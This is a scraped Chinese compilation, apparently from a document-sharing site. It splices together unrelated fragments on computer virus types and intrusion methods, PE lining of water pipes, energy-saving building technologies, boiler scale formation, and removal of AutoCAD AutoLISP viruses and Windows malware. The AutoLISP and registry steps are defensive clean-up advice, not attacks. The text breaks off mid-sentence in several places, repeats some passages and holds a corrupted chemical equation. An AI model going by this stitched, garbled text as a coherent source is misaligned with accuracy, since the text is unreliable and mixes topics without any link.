动执行的恶意程序。木马病毒通过网络或者系统漏洞进入用户的系统并隐藏,然后向外界泄露用户的信息,对用户的电脑进行远程控制。 4、Arp病毒。Arp病毒也是一种木马病毒,它是对利用Arp协议漏洞进行传播的 一类病毒的总称。由于其在局域网中威胁比较大,所以单独列举一下。此病毒通过路由欺骗或网关欺骗的方式来攻击局域网,使用户电脑无法找到正确的网关而不能上网。 5、后门病毒。后门病毒的前缀是:backdoor。该类病毒的公有特性是通过网络 传播,给系统开后门,给用户电脑带来安全隐患。
管道内的水垢用什么方法清除? PIG 物理清洗技术。 2)遇到异口径联接管道内衬如何处理? 分段进行。 3)遇到T口联接处,90度弯口,与100mm以下管道内衬如何施工? 接头处断开,内衬后再连接。100mm以下管道内衬工艺相同,但从性价比上看,工艺适用范围150以上。 4)PE管的寿命多久? 与常规PE管相同,一般50年。 5)牵引机将变形后的PE管拉入管道内时如有损伤,刮伤,如何修补? 小于壁厚15%,不必处理,在允许范围内。 与高压气体管道除垢涂膜专利技术( https://www.doczj.com/doc/6515130426.html, )比较有何优点? 高压气体管道除垢涂膜专利技术重点在‘除垢涂膜’,内衬PE管修复管道技术重点在‘内衬PE管修复’,除了防止二次污染等外可提高承压,是唯一的可提高管线承压的修复方法,另外适用范围不同。 一是地源热泵技术,采用这项技术为建筑物供热制冷大大降低了一次性能源的消耗。二是太阳能与建筑一体化技术,使人类可以利用太阳这人类取之不尽、用之不竭的可再生能源。三是空调节电技术和智能化节能控制技术,通过优化空调压缩机运行曲线,充分利用空调制冷时的剩余冷(热)量来提高制冷(热)效率。四是自保温隔热混凝土砌块技术,利用保温隔热材料和砼空心砌块和为一体,保温隔热材料填充在砌块的空心部分,从而使砼空心砌块具有保温隔热的功能。五是页岩烧结多孔砖技术,它不单方便施工、提高效率,更是便于二次装修,抗风化性能好。六是现浇混凝土空心楼板技术,这样能使建筑物自重减轻、刚度大,降低建筑层高,提高了空间有效利用率,可应用于大跨度、达荷载、大空间和灵活变化空间的商场、教学楼等大中型公共建筑。七是电热膜地热供暖技术,它以电力为能源,以电热膜为发热体,将电能直接转换为热能,以远红外线辐射方式达到供暖目的。八是室内空气净化技术,主要是通过纳米光催化技术、活性炭、分子络合和美加抗微生物水晶保护盾等措施净化空气。九是外墙外保温技术,这项技术近几年来得到广泛推广应用,是目前解决建筑墙体保温隔热的主要技术之一。十是家庭生活节水技术,主要是通过研制了一种新式马桶,大小便冲洗只需1.5—4升水,以此达到节水目的。
cad使用不正常,CAD病毒清除方法 打开CAD后出现一信息分析: 这是一个专门针对CAD的病毒程序,不是传统意义上的病毒,因此,用诺顿、金山毒霸等是不能杀除的。 它的作用机制是这样的:某台机器上没有这个病毒程序,在通过网上邻居拷贝别人的图纸时,大家经常会把整个目录拷贝过来,如果拷贝的这个目录中包含有acad.lsp和acadapp.lsp,你的机器就有了这个病毒,但是还没有起作用。当你用CAD打开这个文件时,CAD会自动加载该目录下的acad.lsp,这个LSP程序会检测你的CAD支持support目录下是否有这两个文件,如果没有,它会自动在那里创建他们的副本。 以后,在你打开别的图纸时,它会在判断你要打开的图纸目录下有没有这两个文件,如果没有,它又在该目录下创建这两个文件的副本。就这样,你的机器上的dwg文件目录中逐步都有了这个程序。随着别人按照目录拷贝你的dwg文件,他们也感染上了。 因此,如果你的机器上没有CAD病毒程序,只要你从别处拷贝图纸时,只拷贝dwg文件就不会感染CAD病毒了. LSP 文件 (.lsp) - 一种包含 AutoLISP 程序代码的 ASCII 文本文件。 FAS 文件 (.fas) - 一个 LSP 程序文件的二进制编译版本。 删除: 进入CAD文件夹,分别查到acad.fas,acad.lsp和 acadapp.lsp,acad.mnl,acad.chw,lcm.fas后删除到C:\Documents and Settings\(你的用户名)\Application Data\Autodesk\AutoCAD 2004\R16.0\chs\Support\下(AutoCAD的版本不同2004和16有可能不同)搜索acad.fas,acad.lsp和acadapp.lsp,acad.mnl,acad.chw,lcm.fas后删除. 全盘搜索acad.fas,acad.lsp后删除. 常见问题是C:\Program Files\autocad***目录(子目录)下的 acad.fas与lcm.fas是在全部查找时找不到的,请手动进入目录再行查找删除! 不想进去目录查找也可以输入下面的字符到CAD命令行: (while (or (setq a (findfile "acad.fas")) (setq a (findfile "lcm.fas"))) (vl-file-delete a)) 注意:上面红字一个字都不能少!这样就行了! 如果有文字编缉时出现记事本的现象请将下面一行红字输入到命令行: (setvar "mtexted" ".") 二。由于CAD病毒有别于传统病毒,致使目前很多杀毒软件对其无能为力,此工具可以帮您将CAD恢复到正常状态! CAD中毒迹象:
计算机病毒入侵途径有哪些 计算机病毒入侵途径一: 计算机病毒的破坏行为体现了病毒的杀伤能力。病毒破坏行为的激烈程度取决于病毒作者的主观愿望和他所具有的技术能量。 数以万计不断发展扩张的病毒,其破坏行为千奇百怪,不可能穷举其破坏行为,而且难以做全面的描述,根据现有的病毒资料可以把病毒的破坏目标和攻击部位归纳如下: 攻击系统数据区,攻击部位包括:硬盘主引寻扇区、boot扇区、fat表、文件目录等。迫使计算机空转,计算机速度明显下降。 攻击磁盘,攻击磁盘数据、不写盘、写操作变读操作、写盘时丢字节等。 扰乱屏幕显示,病毒扰乱屏幕显示的方式很多,可列举如下:字符跌落、环绕、倒置、显示前一屏、光标下跌、滚屏、抖动、乱写、吃字符等。 键盘病毒,干扰键盘操作,已发现有下述方式:响铃、封锁键盘、换字、抹掉缓存区字符、重复、输入紊乱等。喇叭病毒,许多病毒运行时,会使计算机的喇叭发出响声。 有的病毒作者通过喇叭发出种种声音,有的病毒作者让病毒演奏旋律优美的世界名曲,在高雅的曲调中去杀戮人们的信息财富,已发现的喇叭发声有以下方式:演奏曲子、警笛声、炸弹噪声、鸣叫、咔咔声、嘀嗒声等。
攻击cmos ,在机器的cmos区中,保存着系统的重要数据,例如系统时钟、磁盘类型、内存容量等。有的病毒激活时,能够对cmos区进行写入动作,破坏系统cmos中的数据。 干扰打印机,典型现象为:假报警、间断性打印、更换字符等。 计算机病毒入侵途径二: a、源代码嵌入攻击型 从它的名字我们就知道这类病毒入侵的主要是高级语言的源程序,病毒是在源程序编译之前插入病毒代码,最后随源程序一起被编译成可执行文件,这样刚生成的文件就是带毒文件。 当然这类文件是极少数,因为这些病毒开发者不可能轻易得到那些软件开发公司编译前的源程序,况且这种入侵的方式难度较大,需要非常专业的编程水平。 b、代码取代攻击型 这类病毒主要是用它自身的病毒代码取代某个入侵程序的整个或部分模块,这类病毒也少见,它主要是攻击特定的程序,针对性较强,但是不易被发现,清除起来也较困难。 c、系统修改型 这类病毒主要是用自身程序覆盖或修改系统中的某些文件来达到调用或替代操作系统中的部分功能,由于是直接感染系统,危害较大,也是最为多见的一种病毒类型,多为文件型病毒。 d、外壳附加型 这类病毒通常是将其病毒附加在正常程序的头部或尾部,相当于给程序添加了一个外壳,在被感染的程序执行时,病毒代码
水垢的形成机理 工业锅炉在使用过程中,由于给水水质不符合要求,以及操作管理不善等原因,在锅筒、管壁及汽包等部位会产生水垢,水垢形成的机理是比较复杂的。 2.1 给水水质 工业锅炉几乎都是以原水或软化水作为给水,给水使锅炉产生水垢的原因比较多。水垢的形成过程是难溶盐的沉积过程,当炉水温度升高时,炉水中的盐类发生浓缩,当其浓度超过该温度下的溶解度时就会产生沉积;有些盐类,如硫酸钙、硫酸镁、磷酸钙等则随温度升高溶解度下降并析出;在炉水中,当二氧化硅的浓度对碱度而言偏高时也会析出;而可溶性重碳酸盐,如碳酸二氢钙、碳酸二氢镁则受热分解,产生难溶性盐也会导致沉积。 如:O H CO CaCO CO H Ca 223232)(+↑+?→?? 水垢产生的严重程度与给水水质有着非常密切的关系,锅炉给水分原水与软化水。 原水:也称生水,是未经任何处理的天然水(如江河水、湖水、地下水等),一般由自备水源(地面水或地下水)或城市供水网取得,这种水水质差别很大,城市或市郊取用经过过滤处理的自来水水质较稳定,直接采用地下水的水质硬度大。有些单位取用附近未经过滤处理的江河水,水质不稳定,水中含有悬浮物、胶体物质及各种溶解性杂质,尤其是下雨季节,水中混有泥砂,水是黄色浑浊的。我们曾遇见过某厂在雨天用这种水作给水,使用这种水的锅炉极易沉积泥砂垢或泥砂与水垢结成一体的混合垢。 软化水:常用钠离子交换水或炉内处理水,前者应用最多。经钠离子交换树脂处理的水,其硬度一般能满足工业锅炉的要求,司炉中只要定时排污,水垢不易沉积。但是有些单位,因为水处理设备容量小,处理的水量不足,有时则向炉内补充部分原水,从而加快了水垢的沉积。 采用炉内加药处理的水,往往由于加药量不足或加药不及时及排污不严格等
天正CAD产生的acaddoc.lsp病毒怎么解决 ①、关闭CAD(一定要先关闭正在运行的CAD程序)。 ②、进入安全模式(重要前提!!!),按F3键打开XP系统的文件搜索窗口,搜索并删除acad.lsp、acadappp.lsp、acadapp.lsp acadapq.lsp 、acaddoc.lsp 这5个文件。 注意:“搜索范围”一定要选择“本机硬盘驱动器...”,并勾选“搜索选项”中的“高级选项”,将其下的“搜索子文件夹”项勾选上,否则不能将这3个文件全部搜索清除干净。 ③、复制下面的代码在CAD命令行运行,以恢复被修改的系统变量默认值: (setvar "zoomfactor" 40)(setvar"mbuttonpan" 1)(setvar"HIGHLIGHT" 1)(setvar "fillmode" 1) ④用记事本打开CAD下的“acad.mnl”文件,将文件最后一行代码(load "acadappp")删去。(错误: LOAD 失败: "acadapq")的根源。(如“acad.mnl”文件中无此行代码可忽略此操作) 附:“acad.mnl”文件可能在下面的目录中, C:\Documents and Settings\×××\Application Data\Autodesk\AutoCAD 200×\R×.×\chs\Support 其中×××是你登录系统时的用户名,200×和R×.×分别是CAD的版本和版本代号。(注意:目录C:\Documents and Settings\是系统隐藏文件夹) acaddoc.lsp病毒有效的方法。 1:查找acaddoc.lsp,把高级选项打开,把隐藏的也搜索出来删除。 2.查找acadapq.lsp删除。
计算机病毒的入侵方式及分类 如按其入侵的方式来分为以下几种: a、源代码嵌入攻击型 从它的名字我们就知道这类病毒入侵的主要是高级语言的源程序,病毒是在源程序编译之前插入病毒代码,最后随源程序一起被编译成可执行文件,这样刚生成的文件就是带毒文件。当然这类文件是极少数,因为这些病毒开发者不可能轻易得到那些软件开发公司编译前的源程序,况且这种入侵的方式难度较大,需要非常专业的编程水平。 b、代码取代攻击型 这类病毒主要是用它自身的病毒代码取代某个入侵程序的整个或部分模块,这类病毒也少见,它主要是攻击特定的程序,针对性较强,但是不易被发现,清除起来也较困难。
c、系统修改型 这类病毒主要是用自身程序覆盖或修改系统中的某些文件来达到调用或替代操作系统中的部分功能,由于是直接感染系统,危害较大,也是最为多见的一种病毒类型,多为文件型病毒。 d、外壳附加型 这类病毒通常是将其病毒附加在正常程序的头部或尾部,相当于给程序添加了一个外壳,在被感染的程序执行时,病毒代码先被执行,然后才将正常程序调入内存。目前大多数文件型的病毒属于这一类。 如果按病毒的破坏程度来分,我们又可以将病毒划分为以下几种: a、良性病毒: 这些病毒之所以把它们称之为良性病毒,是因为它们入侵的目的不是破坏你的系统,只是想玩一玩而已,多数是一些初级病毒发烧友想测试一下自己的开发病毒程序的水平。它们并不想破坏你的系统,只是发出某种声音,或出现一些提示,除了占用一定的硬盘空间和CPU处理时间外别无其它坏处。如一些木马病毒程序也是这样,只是想窃取你电脑中的一些通讯信息,如密码、IP地址等,以备有需要时
用。 b、恶性病毒 我们把只对软件系统造成干扰、窃取信息、修改系统信息,不会造成硬件损坏、数据丢失等严重后果的病毒归之为“恶性病毒”,这类病毒入侵后系统除了不能正常使用之外,别无其它损失,系统损坏后一般只需要重装系统的某个部分文件后即可恢复,当然还是要杀掉这些病毒之后重装系统。 c、极恶性病毒 这类病毒比上述b类病毒损坏的程度又要大些,一般如果是感染上这类病毒你的系统就要彻底崩溃,根本无法正常启动,你保分留在硬盘中的有用数据也可能随之不能获取,轻一点的还只是删除系统文件和应用程序等。 d、灾难性病毒 这类病毒从它的名字我们就可以知道它会给我们带来
[清除计算机病毒的方法]清除计算机病毒方 法有哪些 清除计算机病毒方法一: 1、全盘搜该文件,删除;[startup.xls] 2、立即在相同位置创建一个同名的0字节文件[startup.xls],并设置为只读、隐藏模式; 3、注册表中搜startup.xls字样,找到后删除; 4、全盘搜名字为 *.xls ,内容包括 startup.xls 字样的文件,如果该文件打开时报错[提示无法打开文件],则证明该文件已经染毒; 5、打开该染毒文件,按 alt+f11 ,vb编辑器打开后,再按ctrl+r ,工程资源管理器打开后,如果找到startup.xls字样,就将该项移除,然后关闭 vb编辑器窗口,将该表保存退出即可。 清除计算机病毒方法二: 删除干净acad.fas与lcm.fas两个文件。 把这行字输入cad命令中去,回车,即可清除。 (while (or (setq a (findfile "acad.fas")) (setq a (findfile "lcm.fas"))) (vl-file-delete a)) 清除计算机病毒方法三: 1、解决杂乱文件影响(减少电脑负担)。
清理杂乱文件有三个方法,第一是点网页上的“工具”,点“internet选项(0)”,在新页面分别点“删除cookies(i)”“删除文件(f)”“清除历史记录(h)”、最后“确定”;第二是用“磁盘清理”,把鼠标指向程序——附件——系统工具——就显示出“磁盘清理”,所有的盘c、d、e等都要清理(主要是系统盘c),第三是“整理磁盘碎片”,把鼠标指向程序——附件——系统工具——就显示出“整理磁盘碎片程序”,主要是整理系统盘c,很慢一般要一到两个小时甚至更多时间。这三种方法可以单独使用,都可以有效的清除正常浏览网页没有保存的所有临时文件,有用的系统文件和安装保存的文件不会被清理。用第一或第二的方法配合第三的方法效果会更好,可以明显改善电脑速度。 2、解决恶意流氓软件、恶意流氓插件和木马影响。 恶意流氓软件、恶意流氓插件和木马,除少数是躲在自己下载的软件和安装的代码里面以外,主要是自己强行安装进电脑的,目的就是干扰操作系统,影响程序正常工作,用“磁盘清理”清不掉,杀毒软件发现不了,用瑞星卡卡助手、奇虎360、清理大师、木马清道夫等等凡杀毒软件配置的助手,都可以用系统优化功能、系统防护功能等有效的清除恶意流氓软件、恶意流氓插件和木马,只要经常清理,就可以保证电脑不受影响。 3、经常更新病毒库,升级杀毒,不要让病毒长期存留在电脑里,选择高级设置,发现病毒杀毒,杀不了隔离文件、隔离不了删除文件、要保证电脑没有保存有病毒,有病毒及时根除。 4、电脑遭遇病毒是难免的,为了减少重装系统的麻烦,一定要在装系统时装“一键恢复”。“一键恢复”就是操作系统备份,
灭毒有招如何全面清除计算机病毒(防毒技巧) 网络时代,病毒已经无所不在。在层出不穷、变化多端的病毒袭击下,中招基本上是不可避免的了。那么中招以后我们改如何处理(当然必须处理,否则计算机没法替你工作)?是格式化系统然后重装Windows,还是请人帮忙……。因为职业关系,我不得不与这些让人讨厌的东西战斗着,逐步地积累了一些行之有效的办法,供大家参考。 一、中毒的一些表现 我们怎样知道电脑中病毒了呢?其实电脑中毒跟人生病一样,总会有一些明显的症状表现出来。例如机器运行十分缓慢、上不了网、杀毒软件生不了级、word文档打不开,电脑不能正常启动、硬盘分区找不到了、数据丢失等等,就是中毒的一些征兆。 二、中毒诊断 1、按Ctrl+Shift+Ese键(同时按此三键),调出windows任务管理器查看系统运行的进程,找出不熟悉进程并记下其名称(这需要经验),如果这些进程是病毒的话,以便于后面的清除。暂时不要结束这些进程,因为有的病毒或非法的进程可能在此没法结束。点击性能查看CPU和内存的当前状态,如果CPU的利用率接近100%或内存的占用值居高不下,此时电脑中毒的可能性是95%。 2、查看windows当前启动的服务项,由“控制面板”的“管理工具”里打开“服务”。看右栏状态为“启动”启动类别为“自动”项的行;一般而言,正常的windows服务,基本上是有描述内容的(少数被骇客或蠕虫病毒伪造的除外),此时双击打开认为有问题的服务项查看其属性里的可执行文件的路径和名称,假如其名称和路径为C:\winnt\system32\explored.exe,计算机中招。有一种情况是“控制面板”打不开或者是所有里面的图标跑到左边,中间有一纵向的滚动条,而右边为空白,再双击添加/删除程序或管理工具,窗体内是空的,这是病毒文件winhlpp32.exe发作的特性。 3、运行注册表编辑器,命令为regedit或regedt32,查看都有那些程序与windows一起启动。主要看Hkey_Local_Machine\Software\MicroSoft\Windows\CurrentVersion\Run和后面几个RunOnce等,查看窗体右侧的项值,看是否有非法的启动项。WindowsXp运行msconfig 也起相同的作用。随着经验的积累,你可以轻易的判断病毒的启动项。 4、用浏览器上网判断。前一阵发作的Gaobot病毒,可以上https://www.doczj.com/doc/6515130426.html,,https://www.doczj.com/doc/6515130426.html,等网站,但是不能访问诸如https://www.doczj.com/doc/6515130426.html,,https://www.doczj.com/doc/6515130426.html,这样著名的安全厂商的网站,安装了symantecNorton2004的杀毒软件不能上网升级。 5、取消隐藏属性,查看系统文件夹winnt(windows)\system32,如果打开后文件夹为空,表明电脑已经中毒;打开system32后,可以对图标按类型排序,看有没有流行病毒的执行文件存在。顺便查一下文件夹Tasks,wins,drivers.目前有的病毒执行文件就藏身于此;drivers\etc下的文件hosts是病毒喜欢篡改的对象,它本来只有700字节左右,被篡改后就成了1Kb以上,这是造成一般网站能访问而安全厂商网站不能访问、著名杀毒软件不能升级的原因所在。 6、由杀毒软件判断是否中毒,如果中毒,杀毒软件会被病毒程序自动终止,并且手动升级失败。 三、灭毒 1、在注册表里删除随系统启动的非法程序,然后在注册表中搜索所有该键值,删除之。当成系统服务启动的病毒程序,会在Hkey_Local_Machine\System\ControlSet001\services 和controlset002\services里藏身,找到之后一并消灭。 2、停止有问题的服务,改自动为禁止。 3、如果文件system32\drivers\etc\hosts被篡改,恢复它,即只剩下一行有效值 “127.0.0.1localhost”,其余的行删除。再把host设置成只读。 4、重启电脑,摁F8进“带网络的安全模式”。目的是不让病毒程序启动,又可以对Windows 升级打补丁和对杀毒软件升级。 5、搜索病毒的执行文件,手动消灭之。 6、对Windows升级打补丁和对杀毒软件升级。 7、关闭不必要的系统服务,如remoteregistryservice。 8、第6步完成后用杀毒软件对系统进行全面的扫描,剿灭漏网之鱼。 9、上步完成后,重启计算机,完成所有操作。